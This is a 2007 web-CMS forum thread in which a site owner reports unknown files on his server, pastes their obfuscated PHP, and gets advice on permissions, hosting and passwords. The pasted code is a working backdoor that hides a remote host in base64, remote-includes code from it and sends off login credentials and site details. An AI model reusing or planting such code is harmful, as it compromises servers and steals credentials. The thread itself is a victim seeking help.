Author Topic: think ive been hacked  (Read 3741 times)

Offline wwwMARKLEYcouk

  • Posts: 287
  • Gender: Male
    • Markley IT & Storage
think ive been hacked
« on: October 18, 2007, 03:08:05 PM »
i really hope someone can help.. i think that i've been hacked but not sure.. on a certain day and time im finding files all over my sites (SMF forum section was the worst). Now the files are only appearing in sections where my folders are at 757 permissions, nowhere else and have random names that do no belong.. here are the contents:

Code: [Select]
php -> error_reporting(0);if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}if(!@include_once(base64_decode("aHR0cDovLw==")."hdihzzazbzggc".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print "sys_active".`uname -a`;}} <--

its in php (i have removed the code prefixes. Could anyone please tell me what is happening in this code cos its the same in all the random files..

thanks

pcwacht

  • Guest
Re: think ive been hacked
« Reply #1 on: October 18, 2007, 07:43:06 PM »

Offline wwwMARKLEYcouk

  • Posts: 287
  • Gender: Male
    • Markley IT & Storage
Re: think ive been hacked
« Reply #2 on: October 19, 2007, 10:23:16 AM »
thanks for that pcwacht and i would love to reduce to 755 but unfortunately if i do that i have no access to add/remove on any of my websites with WB :( from what i can gather its because im not the owner of the apache server or something.. its annoying

Offline kweitzel

  • WebsiteBaker Org e.V.
  • **
  • Posts: 6983
  • Gender: Male
Re: think ive been hacked
« Reply #3 on: October 19, 2007, 06:55:42 PM »
--> ISP .. as soon as possible.

cheers

Klaus

Offline wwwMARKLEYcouk

  • Posts: 287
  • Gender: Male
    • Markley IT & Storage
Re: think ive been hacked
« Reply #4 on: October 23, 2007, 07:40:16 PM »
its definately a hack (thanks for the info pcwacht). I have notified my ISP and tbh i have no NO response from them and there hasnt been any reply or contact back with queries or anything.. very bad i think..

anyone recommend a really good host for WB sites and offering at least 100 addon domains?

thanks

lanesharon

  • Guest
Re: think ive been hacked
« Reply #5 on: November 25, 2007, 12:33:42 AM »
I have used ASO for a few years now.  I run a number of websites on one shared account, but I may be moving up into virtual hosting soon.  I can honestly say that in those years, I have had a few problems, but considering my previous hosting accounts, I consider their problems to be 'less than normal' for hosting companies.

They have unlimited domain add ons and subdomans; as well as email accounts and mysql databases.  You can start with a very small plan and work up the ladder as you need to (that is exactly what I have been doing).  They offer shared, virtual, and dedicated hosting.  You can view their plans here:
--> ASO Accounts

Offline wwwMARKLEYcouk

  • Posts: 287
  • Gender: Male
    • Markley IT & Storage
Re: think ive been hacked
« Reply #6 on: November 25, 2007, 05:03:23 PM »
cheers for that lanesharon :) i have since managed to get myself a new host and these guys are top form :)

elogoid

  • Guest
Re: think ive been hacked
« Reply #7 on: January 10, 2008, 01:28:00 AM »
All I can advice is changing your password every now and then. All the bigger hosting companies have security measures in place but nothing is 100% full proof unfortunitly. I got hacked into my hosting account with godaddy a while back but got everything back. The really bad thing is that the police department explained to me that it could take months before an investigation would be started.
 So your basically on your own. The best thing is to change your password frequently and lock your domains.